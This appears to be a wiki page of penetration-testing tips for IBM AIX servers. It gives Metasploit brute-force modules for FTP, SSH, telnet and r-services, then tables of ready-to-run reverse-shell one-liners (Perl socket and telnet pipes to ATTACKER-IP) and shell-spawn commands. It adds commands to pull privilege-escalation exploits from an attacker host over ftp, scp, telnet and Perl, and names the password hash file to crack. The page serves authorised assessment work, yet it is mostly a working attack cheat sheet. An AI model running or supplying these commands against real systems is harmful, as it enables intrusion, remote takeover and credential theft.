-
Notifications
You must be signed in to change notification settings - Fork 9
General Assessment Tips
A few techniques involving default AIX packages/services that you may find useful at various stages of your assessment.
The attack vectors available to you will completely depend on the server’s configuration and running services. You MAY find some of the services listed below running on AIX servers.
| Port | Service | Attack Vector |
|---|---|---|
| 21 | FTP. | Brute force. Metasploit module: auxiliary/scanner/ftp/ftp_login |
| 22 | SSH. | Brute force. Metasploit module: auxiliary/scanner/ssh/ssh_login |
| 23 | Telnet. | Brute force. Metasploit module: auxiliary/scanner/telnet/telnet_login |
| 512 | rexec. | Brute force. Metasploit module: auxiliary/scanner/rservices/rexec_login |
| 513 | rlogin. | Brute force. Metasploit module: auxiliary/scanner/rservices/rlogin_login |
| 80, 443 and countless others; this will vary depending on what additional software is installed on the server. | Web. | Default passwords, brute force, shell uploads (WAR, jsp) etc. |
So you have command execution and want to level up and get a reverse shell? Setup a listener and try a few of the commands below.
| Software/Package | Command |
|---|---|
| Perl | /usr/bin/perl -e 'use Socket;$i="ATTACKER-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");}; |
| Telnet | telnet ATTACKER-IP 80 | /bin/sh | LOCAL-IP 44445 |
| Telnet | telnet ATTACKING-IP 80 | /bin/sh | telnet ATTACKING-IP 443 (Remember to listen on both port 80 & 443.) |
As is often the case, you may have found yourself in a restricted non-tty shell that limits your options when interacting with the server. Here are some tty shell spawns to try out.
| Software/Package | Command |
|---|---|
| /bin/sh | /bin/sh -i |
| Perl | perl -e 'exec "/bin/sh";' |
| Perl | perl: exec "/bin/sh"; |
At some point during your post-exploitation, you’re probably going to want to download a file like a privilege escalation exploit onto the server. Some default programs installed on AIX that can aid you with file downloads are listed below (you're not likely to find wget, curl or nc installed, but you should still check if they are).
| Software/Package | Command |
|---|---|
| FTP | ftp ATTACKER-IP (Input username & password) get FILE |
| SCP | scp ATTACKER-USER@ATTACKER-IP:/path/to/remote/FILE /path/to/local/FILE |
| Telnet | (echo 'GET /FILE'; echo ""; sleep 1; ) | telnet ATTACKER-IP 80 > FILE' (NOTE: This command will also record some unnecessary telnet command output at the top of the downloaded file which could affect execution if it’s a shell script. You can use tail to strip this unnecessary output: tail -n +6 FILE > FILE2) |
| Perl | echo '#!/usr/bin/perl' > downloader.pl && echo 'use LWP::Simple; getstore("http://ATTACKER-IP:80/FILE", "FILE");' >> downloader.pl && perl downloader.pl |
| Perl | lwp-download http://ATTACKER-IP/FILE (NOTE: lwp-download usually comes packaged with Perl.) |
Offensive Security’s Exploit Database has a number of privilege escalation exploits for various versions of AIX that you may find useful: https://www.exploit-db.com/
AIX’s user password hashes are stored in the ‘/etc/security/passwd’ file.
These hashes aren’t stored in a format similar to other Unix systems. Hashcat does have support for various hashing mechanisms used by AIX systems, you can find some example hashes here (search for AIX).